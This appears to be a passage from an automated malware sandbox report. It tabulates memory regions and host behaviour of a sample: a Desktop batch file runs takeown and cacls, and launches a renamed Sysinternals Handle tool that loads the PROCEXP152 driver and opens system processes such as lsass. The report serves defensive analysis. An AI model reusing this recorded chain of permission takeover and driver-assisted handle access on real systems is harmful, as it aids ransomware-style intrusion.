| private_0x0000000004790000 | 0x04790000 | 0x04793fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000047a0000 | 0x047a0000 | 0x047b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000047c0000 | 0x047c0000 | 0x047fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x048fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004900000 | 0x04900000 | 0x04903fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004910000 | 0x04910000 | 0x04910fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004920000 | 0x04920000 | 0x04921fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04930000 | 0x049edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x049fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04ecffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04ed0000 | 0x05206fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee20000 | 0x7ee20000 | 0x7ef1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef20000 | 0x7ef20000 | 0x7ef42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef47000 | 0x7ef47000 | 0x7ef47fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef48000 | 0x7ef48000 | 0x7ef4afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef4b000 | 0x7ef4b000 | 0x7ef4dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef4e000 | 0x7ef4e000 | 0x7ef4efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 248, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xe8c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xb20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xd90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Journal.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Journal.exe.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #37: qry2vco264.exe
550
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe |
| Command Line | qRY2vco2.exe -accepteula "separate.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:59, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:38 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc28 |
| Parent PID | 0x60c (c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
320
0x
95C
0x
484
0x
274
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00186fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002c0000 | 0x0037dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x008d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x01cdffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01de1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01feffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ff4a000 | 0x7ff4a000 | 0x7ff4afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| qry2vco264.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff6000 | 0x7ff5ffff6000 | 0x7ff5ffff7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffff8000 | 0x7ff5ffff8000 | 0x7ff5ffff9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffa000 | 0x7ff5ffffa000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffc000 | 0x7ff5ffffc000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| comctl32.dll | 0x7ffc3e410000 | 0x7ffc3e4b9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffc52cd0000 | 0x7ffc52d47fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc54670000 | 0x7ffc54c97fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc559d0000 | 0x7ffc56ef4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffc57460000 | 0x7ffc57537fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\Global\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Windows\system32\Drivers\PROCEXP152.SYS | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Windows\system32\Drivers\PROCEXP152.SYS | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Windows\system32\Drivers\PROCEXP152.SYS | size = 32768 |
|
1 | |
| Write | C:\Windows\system32\Drivers\PROCEXP152.SYS | size = 1560 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 | |
| Delete | C:\Windows\system32\Drivers\PROCEXP152.SYS | - |
|
1 |
Registry (13)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Type, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ErrorControl, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = Start, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | value_name = ImagePath, data = \??\C:\Windows\system32\Drivers\PROCEXP152.SYS, size = 92, type = REG_SZ |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Enum | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152\Security | - |
|
1 | |
| Delete Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PROCEXP152 | - |
|
1 |
Process (110)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
3 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\syswow64\schtasks.exe | desired_access = PROCESS_DUP_HANDLE |
|
4 | |
| Open | c:\windows\syswow64\schtasks.exe | desired_access = PROCESS_DUP_HANDLE |
|
4 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\commands-xerox-relationship.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\recorder.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\shift.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\unsubscribe-wisdom.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\shoe-associations.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\adobe\israeli-runtime-recommendation.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\les lodging.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\normally.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\dir.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\baseball-showing-idaho.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\returned.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows nt\sweden_decorative_wit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\se-viii.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
